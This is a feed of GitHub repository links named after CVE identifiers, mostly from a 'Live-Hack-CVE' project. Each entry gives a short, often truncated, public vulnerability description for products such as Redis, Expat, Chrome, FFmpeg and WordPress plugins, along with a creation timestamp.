**Redis is an open source, in-memory database that persists on disk. In affected versions an integer overflow bug in Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves changing the default proto-max-bulk-len and client-query-buffer-limit configuration CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32627](https://github.com/Live-Hack-CVE/CVE-2021-32627) create time: 2022-12-29T09:05:32Z

**Redis is an open source, in-memory database that persists on disk. An integer overflow bug in the ziplist data structure used by all versions of Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves modifying the default ziplist configuration parameters CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32628](https://github.com/Live-Hack-CVE/CVE-2021-32628) create time: 2022-12-29T09:05:28Z

**Redis is an in-memory database that persists on disk. A vulnerability involving out-of-bounds read and integer overflow to buffer overflow exists starting with version 2.2 and prior to versions 5.0.13, 6.0.15, and 6.2.5. On 32-bit systems, Redis `*BIT*` command are vulnerable to integer overflow that can potentially be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32761](https://github.com/Live-Hack-CVE/CVE-2021-32761) create time: 2022-12-29T09:05:25Z

**Redis is an open source, in-memory database that persists on disk. An integer overflow bug affecting all versions of Redis can be exploited to corrupt the heap and potentially be used to leak arbitrary contents of the heap or trigger remote code execution. The vulnerability involves changing the default set-max-intset- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32687](https://github.com/Live-Hack-CVE/CVE-2021-32687) create time: 2022-12-29T09:05:21Z

**A vulnerability has been identified in SIMATIC RF166C (All versions > V1.1 and < V1.3.2), SIMATIC RF185C (All versions > V1.1 and < V1.3.2), SIMATIC RF186C (All versions > V1.1 and < V1.3.2), SIMATIC RF186CI (All versions > V1.1 and < V1.3.2), SIMATIC RF188C (All versions > V1.1 and < V1.3.2), SIMATIC RF188CI (All vers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31340](https://github.com/Live-Hack-CVE/CVE-2021-31340) create time: 2022-12-29T09:05:05Z

**Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45105](https://github.com/Live-Hack-CVE/CVE-2021-45105) create time: 2022-12-29T09:05:00Z

**On F5 BIG-IP APM 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all versions of 12.1.x and 11.6.x, as well as F5 BIG-IP APM Clients 7.x versions prior to 7.2.1.5, BIG-IP Edge Client may log sensitive APM session-related infor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27636](https://github.com/Live-Hack-CVE/CVE-2022-27636) create time: 2022-12-29T09:11:25Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Difficult to exploit vulnerability allows u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21443](https://github.com/Live-Hack-CVE/CVE-2022-21443) create time: 2022-12-29T09:11:22Z

**A vulnerability has been identified in Desigo DXR2 (All versions < V01.21.142.5-22), Desigo PXC3 (All versions < V01.21.142.4-18), Desigo PXC4 (All versions < V02.20.142.10-10884), Desigo PXC5 (All versions < V02.20.142.10-10884). The web application returns an AuthToken that does not expire at the defined auto logoff CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24042](https://github.com/Live-Hack-CVE/CVE-2022-24042) create time: 2022-12-29T09:11:18Z

**A vulnerability has been identified in Desigo DXR2 (All versions < V01.21.142.5-22), Desigo PXC3 (All versions < V01.21.142.4-18), Desigo PXC4 (All versions < V02.20.142.10-10884), Desigo PXC5 (All versions < V02.20.142.10-10884). The web application stores the PBKDF2 derived key of users passwords with a low iteration CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24041](https://github.com/Live-Hack-CVE/CVE-2022-24041) create time: 2022-12-29T09:11:14Z

**A vulnerability has been identified in Desigo DXR2 (All versions < V01.21.142.5-22), Desigo PXC3 (All versions < V01.21.142.4-18), Desigo PXC4 (All versions < V02.20.142.10-10884), Desigo PXC5 (All versions < V02.20.142.10-10884). The web application fails to enforce an upper bound to the cost factor of the PBKDF2 deri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24040](https://github.com/Live-Hack-CVE/CVE-2022-24040) create time: 2022-12-29T09:11:11Z

**A vulnerability has been identified in Desigo PXC4 (All versions < V02.20.142.10-10884), Desigo PXC5 (All versions < V02.20.142.10-10884). The “addCell” JavaScript function fails to properly sanitize user-controllable input before including it into the generated XML body of the XLS report document, such that it is poss CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24039](https://github.com/Live-Hack-CVE/CVE-2022-24039) create time: 2022-12-29T09:11:08Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows una CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21476](https://github.com/Live-Hack-CVE/CVE-2022-21476) create time: 2022-12-29T09:10:59Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21496](https://github.com/Live-Hack-CVE/CVE-2022-21496) create time: 2022-12-29T09:10:56Z

**nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22826](https://github.com/Live-Hack-CVE/CVE-2022-22826) create time: 2022-12-29T09:10:38Z

**Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38751](https://github.com/Live-Hack-CVE/CVE-2022-38751) create time: 2022-12-29T09:10:11Z

**Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38750](https://github.com/Live-Hack-CVE/CVE-2022-38750) create time: 2022-12-29T09:10:08Z

**storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22827](https://github.com/Live-Hack-CVE/CVE-2022-22827) create time: 2022-12-29T09:10:04Z

**Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38749](https://github.com/Live-Hack-CVE/CVE-2022-38749) create time: 2022-12-29T09:10:00Z

**kkFileView v4.1.0 is vulnerable to Cross Site Scripting (XSS) via the parameter 'errorMsg.' CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40879](https://github.com/Live-Hack-CVE/CVE-2022-40879) create time: 2022-12-29T09:09:56Z

**SourceCodester Best Student Result Management System 1.0 is vulnerable to SQL Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40887](https://github.com/Live-Hack-CVE/CVE-2022-40887) create time: 2022-12-29T09:09:53Z

**isolated-vm is a library for nodejs which gives the user access to v8's Isolate interface. In versions 4.3.6 and prior, if the untrusted v8 cached data is passed to the API through CachedDataOptions, attackers can bypass the sandbox and run arbitrary code in the nodejs process. As of time of publication, there are no k CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39266](https://github.com/Live-Hack-CVE/CVE-2022-39266) create time: 2022-12-29T09:09:50Z

**Archery v1.4.0 to v1.8.5 was discovered to contain a SQL injection vulnerability via the ThreadIDs parameter in the kill_session interface. The project has released an update, please upgrade to v1.9.0 and above. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38542](https://github.com/Live-Hack-CVE/CVE-2022-38542) create time: 2022-12-29T09:09:46Z

**Archery v1.7.5 to v1.8.5 was discovered to contain a SQL injection vulnerability via the where parameter at /archive/apply. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38539](https://github.com/Live-Hack-CVE/CVE-2022-38539) create time: 2022-12-29T09:09:43Z

**In NOKIA 1350 OMS R14.2, multiple SQL Injection vulnerabilities occurs. Exploitation requires an authenticated attacker. Through the injection of arbitrary SQL statements, a potential authenticated attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39817](https://github.com/Live-Hack-CVE/CVE-2022-39817) create time: 2022-12-29T09:09:39Z

**The Database Peek WordPress plugin through 1.2 does not sanitize and escape the match parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0619](https://github.com/Live-Hack-CVE/CVE-2022-0619) create time: 2022-12-29T09:09:25Z

**lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22825](https://github.com/Live-Hack-CVE/CVE-2022-22825) create time: 2022-12-29T09:09:21Z

**defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22824](https://github.com/Live-Hack-CVE/CVE-2022-22824) create time: 2022-12-29T09:09:18Z

**build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22823](https://github.com/Live-Hack-CVE/CVE-2022-22823) create time: 2022-12-29T09:09:15Z

**Due to missing authorization check, SAP NetWeaver Application Server for ABAP - versions 700, 701, 702, 731, allows an authenticated attacker, to access content on the start screen of any transaction that is available with in the same SAP system even if he/she isn't authorized for that transaction. A successful exploit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26102](https://github.com/Live-Hack-CVE/CVE-2022-26102) create time: 2022-12-29T09:09:04Z

**SAP NetWeaver Application Server for ABAP and ABAP Platform do not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29611](https://github.com/Live-Hack-CVE/CVE-2022-29611) create time: 2022-12-29T09:09:01Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20495](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20495) create time: 2022-12-29T09:08:18Z

**SAP NetWeaver ABAP Server and ABAP Platform - versions 740, 750, 787, allows an unauthenticated attacker to redirect users to a malicious site due to insufficient URL validation. This could lead to the user being tricked to disclose personal information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28215](https://github.com/Live-Hack-CVE/CVE-2022-28215) create time: 2022-12-29T09:07:56Z

**SAP NetWeaver, ABAP Platform and SAP Host Agent - versions KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88, 8.04, KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, 8.04, SAPHOSTAGENT 7.22, allows an authenticated user to misuse a function of sapcontrol webfunctionality(startservice) in Kern CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29612](https://github.com/Live-Hack-CVE/CVE-2022-29612) create time: 2022-12-29T09:07:52Z

**addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22822](https://github.com/Live-Hack-CVE/CVE-2022-22822) create time: 2022-12-29T09:07:45Z

**The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2314](https://github.com/Live-Hack-CVE/CVE-2022-2314) create time: 2022-12-29T09:07:42Z

**perl-Convert-ASN1 (aka the Convert::ASN1 module for Perl) through 0.27 allows remote attackers to cause an infinite loop via unexpected input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-7488](https://github.com/Live-Hack-CVE/CVE-2013-7488) create time: 2022-12-29T08:19:30Z

**spice-vdagent up to and including 0.17.0 does not properly escape save directory before passing to shell, allowing local attacker with access to the session the agent runs in to inject arbitrary commands to be executed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-15108](https://github.com/Live-Hack-CVE/CVE-2017-15108) create time: 2022-12-29T07:43:59Z

**In Long Range Zip (aka lrzip) 0.631, there is an infinite loop and application hang in the get_fileinfo function (lrzip.c). Remote attackers could leverage this vulnerability to cause a denial of service via a crafted lrz file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-5786](https://github.com/Live-Hack-CVE/CVE-2018-5786) create time: 2022-12-29T08:19:34Z

**An issue was discovered in fs/f2fs/super.c in the Linux kernel through 4.14. A denial of service (out-of-bounds memory access and BUG) can occur upon encountering an abnormal bitmap size when mounting a crafted f2fs image. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-13096](https://github.com/Live-Hack-CVE/CVE-2018-13096) create time: 2022-12-29T07:47:35Z

**An issue was discovered in fs/f2fs/inline.c in the Linux kernel through 4.4. A denial of service (out-of-bounds memory access and BUG) can occur for a modified f2fs filesystem image in which an inline inode contains an invalid reserved blkaddr. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-13099](https://github.com/Live-Hack-CVE/CVE-2018-13099) create time: 2022-12-29T07:47:32Z

**An issue was discovered in AdPlug 2.3.1. There are several double-free vulnerabilities in the CEmuopl class in emuopl.cpp because of a destructor's two OPLDestroy calls, each of which frees TL_TABLE, SIN_TABLE, AMS_TABLE, and VIB_TABLE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17825](https://github.com/Live-Hack-CVE/CVE-2018-17825) create time: 2022-12-29T07:47:28Z

**A flaw was found in the way pacemaker's client-server authentication was implemented in versions up to and including 2.0.0. A local attacker could use this flaw, and combine it with other IPC weaknesses, to achieve local privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16877](https://github.com/Live-Hack-CVE/CVE-2018-16877) create time: 2022-12-29T07:47:25Z

**A flaw was found in pacemaker up to and including version 2.0.1. An insufficient verification inflicted preference of uncontrolled processes can lead to DoS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16878](https://github.com/Live-Hack-CVE/CVE-2018-16878) create time: 2022-12-29T07:47:01Z

**The flv_write_packet function in libavformat/flvenc.c in FFmpeg through 2.8 does not check for an empty audio packet, leading to an assertion failure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-15822](https://github.com/Live-Hack-CVE/CVE-2018-15822) create time: 2022-12-29T07:46:58Z

**The decode_init function in libavcodec/utvideodec.c in FFmpeg 2.8 through 3.4.2 allows remote attackers to cause a denial of service (Out of array read) via an AVI file with crafted dimensions within chroma subsampling data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-7557](https://github.com/Live-Hack-CVE/CVE-2018-7557) create time: 2022-12-29T07:46:55Z

**Ingenico Telium 2 POS terminals have a buffer overflow via SOCKET_TASK in the NTPT3 protocol. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17773](https://github.com/Live-Hack-CVE/CVE-2018-17773) create time: 2022-12-29T07:46:51Z

**In the Linux kernel through 3.2, the rds_message_alloc_sgs() function does not validate a value that is used during DMA page allocation, leading to a heap-based out-of-bounds write (related to the rds_rdma_extra_size function in net/rds/rdma.c). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-5332](https://github.com/Live-Hack-CVE/CVE-2018-5332) create time: 2022-12-29T07:46:48Z

**The iJoomla com_adagency plugin 6.0.9 for Joomla! allows SQL injection via the `advertiser_status` and `status_select` parameters to index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-5696](https://github.com/Live-Hack-CVE/CVE-2018-5696) create time: 2022-12-29T07:41:23Z

**Ingenico Telium 2 POS terminals have hardcoded PPP credentials. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17767](https://github.com/Live-Hack-CVE/CVE-2018-17767) create time: 2022-12-29T07:38:50Z

**Ingenico Telium 2 POS terminals have a buffer overflow via the 0x26 command of the NTPT3 protocol. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17769](https://github.com/Live-Hack-CVE/CVE-2018-17769) create time: 2022-12-29T07:38:40Z

**Ingenico Telium 2 POS terminals have hardcoded FTP credentials. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17771](https://github.com/Live-Hack-CVE/CVE-2018-17771) create time: 2022-12-29T07:38:36Z

**Ingenico Telium 2 POS terminals have an insecure TRACE protocol. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17768](https://github.com/Live-Hack-CVE/CVE-2018-17768) create time: 2022-12-29T07:38:33Z

**AdPlug 2.3.1 has a heap-based buffer overflow in CxadbmfPlayer::__bmf_convert_stream() in bmf.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14690](https://github.com/Live-Hack-CVE/CVE-2019-14690) create time: 2022-12-29T08:23:35Z

**AdPlug 2.3.1 has a heap-based buffer overflow in CdtmLoader::load() in dtm.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14691](https://github.com/Live-Hack-CVE/CVE-2019-14691) create time: 2022-12-29T08:23:31Z

**docker-credential-helpers before 0.6.3 has a double free in the List functions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1020014](https://github.com/Live-Hack-CVE/CVE-2019-1020014) create time: 2022-12-29T08:23:17Z

**AdPlug 2.3.1 has a double free in the Cu6mPlayer class in u6m.h. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15151](https://github.com/Live-Hack-CVE/CVE-2019-15151) create time: 2022-12-29T08:23:10Z

**Gila CMS before 1.11.6 has reflected XSS via the admin/content/postcategory id parameter, which is mishandled for g_preview_theme. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20803](https://github.com/Live-Hack-CVE/CVE-2019-20803) create time: 2022-12-29T08:21:46Z

**Gila CMS before 1.11.6 allows CSRF with resultant XSS via the admin/themes URI, leading to compromise of the admin account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20804](https://github.com/Live-Hack-CVE/CVE-2019-20804) create time: 2022-12-29T08:21:42Z

**A remote buffer overflow vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.16 and below; Aruba Instant 8.3.x: 8.3.0.12 and below; Aruba Instant 8.5.x: 8.5.0.6 and below; Aruba Instant 8.6.x: 8.6.0.2 a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5319](https://github.com/Live-Hack-CVE/CVE-2019-5319) create time: 2022-12-29T08:19:27Z

**A vulnerability was found in quay-2, where a stored XSS vulnerability has been found in the super user function of quay. Attackers are able to use the name field of service key to inject scripts and make it run when admin users try to change the name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3865](https://github.com/Live-Hack-CVE/CVE-2019-3865) create time: 2022-12-29T08:19:10Z

**ax25_create in net/ax25/af_ax25.c in the AF_AX25 network module in the Linux kernel 3.16 through 5.3.2 does not enforce CAP_NET_RAW, which means that unprivileged users can create a raw socket, aka CID-0614e2b73768. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17052](https://github.com/Live-Hack-CVE/CVE-2019-17052) create time: 2022-12-29T08:18:56Z

**WordPress before 5.2.3 allows XSS in post previews by authenticated users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16223](https://github.com/Live-Hack-CVE/CVE-2019-16223) create time: 2022-12-29T07:48:14Z

**A denial of service in the subtitle decoder in FFmpeg 3.2 and 4.1 allows attackers to hog the CPU via a crafted video file in Matroska format, because handle_open_brace in libavcodec/htmlsubtitles.c has a complex format argument to sscanf. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9721](https://github.com/Live-Hack-CVE/CVE-2019-9721) create time: 2022-12-29T07:47:59Z

**In FFmpeg 3.2 and 4.1, a denial of service in the subtitle decoder allows attackers to hog the CPU via a crafted video file in Matroska format, because ff_htmlmarkup_to_ass in libavcodec/htmlsubtitles.c has a complex format argument to sscanf. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9718](https://github.com/Live-Hack-CVE/CVE-2019-9718) create time: 2022-12-29T07:46:44Z

**A reflected Cross-site scripting (XSS) vulnerability in ShoreTel Connect ONSITE before 19.49.1500.0 allows remote attackers to inject arbitrary web script or HTML via the brandUrl parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9591](https://github.com/Live-Hack-CVE/CVE-2019-9591) create time: 2022-12-29T07:44:49Z

**A reflected Cross-site scripting (XSS) vulnerability in ShoreTel Connect ONSITE 19.45.1602.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9592](https://github.com/Live-Hack-CVE/CVE-2019-9592) create time: 2022-12-29T07:44:39Z

**When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17563](https://github.com/Live-Hack-CVE/CVE-2019-17563) create time: 2022-12-29T07:43:56Z

**WavpackSetConfiguration64 in pack_utils.c in libwavpack.a in WavPack through 5.1.0 has a "Conditional jump or move depends on uninitialised value" condition, which might allow attackers to cause a denial of service (application crash) via a DFF file that lacks valid sample-rate data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11498](https://github.com/Live-Hack-CVE/CVE-2019-11498) create time: 2022-12-29T07:43:48Z

**An issue was discovered in supplementary Go cryptography libraries, aka golang-googlecode-go-crypto, before 2019-03-20. A flaw was found in the amd64 implementation of golang.org/x/crypto/salsa20 and golang.org/x/crypto/salsa20/salsa. If more than 256 GiB of keystream is generated, or if the counter otherwise grows gre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11840](https://github.com/Live-Hack-CVE/CVE-2019-11840) create time: 2022-12-29T07:42:00Z

**The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17359](https://github.com/Live-Hack-CVE/CVE-2019-17359) create time: 2022-12-29T07:41:56Z

**TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11135](https://github.com/Live-Hack-CVE/CVE-2019-11135) create time: 2022-12-29T07:41:50Z

**WavPack 5.1 and earlier is affected by: CWE 369: Divide by Zero. The impact is: Divide by zero can lead to sudden crash of a software/service that tries to parse a .wav file. The component is: ParseDsdiffHeaderConfig (dsdiff.c:282). The attack vector is: Maliciously crafted .wav file. The fixed version is: After commit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1010315](https://github.com/Live-Hack-CVE/CVE-2019-1010315) create time: 2022-12-29T07:41:32Z

**A reflected Cross-site scripting (XSS) vulnerability in ShoreTel Connect ONSITE 18.82.2000.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9593](https://github.com/Live-Hack-CVE/CVE-2019-9593) create time: 2022-12-29T07:41:28Z

**libavcodec/hevcdec.c in FFmpeg 3.4 and 4.1.2 mishandles detection of duplicate first slices, which allows remote attackers to cause a denial of service (NULL pointer dereference and out-of-array access) or possibly have unspecified other impact via crafted HEVC data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11338](https://github.com/Live-Hack-CVE/CVE-2019-11338) create time: 2022-12-29T07:39:15Z

**When GNOME Dia before 2019-11-27 is launched with a filename argument that is not a valid codepoint in the current encoding, it enters an endless loop, thus endlessly writing text to stdout. If this launch is from a thumbnailer service, this output will usually be written to disk via the system's logging facility (pote CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19451](https://github.com/Live-Hack-CVE/CVE-2019-19451) create time: 2022-12-29T07:39:11Z

**Use after free in V8 in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5813](https://github.com/Live-Hack-CVE/CVE-2019-5813) create time: 2022-12-29T07:37:37Z

**Out of bounds access in SwiftShader in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5846](https://github.com/Live-Hack-CVE/CVE-2019-5846) create time: 2022-12-29T07:37:33Z

**Out of bounds access in SwiftShader in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5845](https://github.com/Live-Hack-CVE/CVE-2019-5845) create time: 2022-12-29T07:37:29Z

**Insufficient policy enforcement in full screen in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to spoof security UI via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6431](https://github.com/Live-Hack-CVE/CVE-2020-6431) create time: 2022-12-29T08:23:42Z

**In Mozilla Bleach before 3.11, a mutation XSS affects users calling bleach.clean with noscript and a raw tag in the allowed/whitelisted tags option. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6802](https://github.com/Live-Hack-CVE/CVE-2020-6802) create time: 2022-12-29T08:23:24Z

**A stored cross-site scripting (XSS) vulnerability exists in the WPForms Contact Form (aka wpforms-lite) plugin before 1.5.9 for WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10385](https://github.com/Live-Hack-CVE/CVE-2020-10385) create time: 2022-12-29T08:23:13Z

**There is a vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 with a smuggling attack and Transfer-Encoding and Content length headers. Upgrade to versions 7.1.9 and 8.0.6 or later versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1944](https://github.com/Live-Hack-CVE/CVE-2020-1944) create time: 2022-12-29T08:22:44Z

**Insufficient policy enforcement in extensions in Google Chrome prior to 81.0.4044.92 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6435](https://github.com/Live-Hack-CVE/CVE-2020-6435) create time: 2022-12-29T08:22:40Z

**Insufficient policy enforcement in navigations in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to bypass security UI via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6439](https://github.com/Live-Hack-CVE/CVE-2020-6439) create time: 2022-12-29T08:22:36Z

**Insufficient policy enforcement in extensions in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6433](https://github.com/Live-Hack-CVE/CVE-2020-6433) create time: 2022-12-29T08:22:32Z

**Inappropriate implementation in extensions in Google Chrome prior to 81.0.4044.92 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information via a crafted Chrome Extension. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6440](https://github.com/Live-Hack-CVE/CVE-2020-6440) create time: 2022-12-29T08:22:25Z

**Inappropriate implementation in WebView in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to spoof security UI via a crafted application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6437](https://github.com/Live-Hack-CVE/CVE-2020-6437) create time: 2022-12-29T08:22:21Z

**In Mozilla Bleach before 3.12, a mutation XSS in bleach.clean when RCDATA and either svg or math tags are whitelisted and the keyword argument strip=False. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6816](https://github.com/Live-Hack-CVE/CVE-2020-6816) create time: 2022-12-29T08:22:18Z

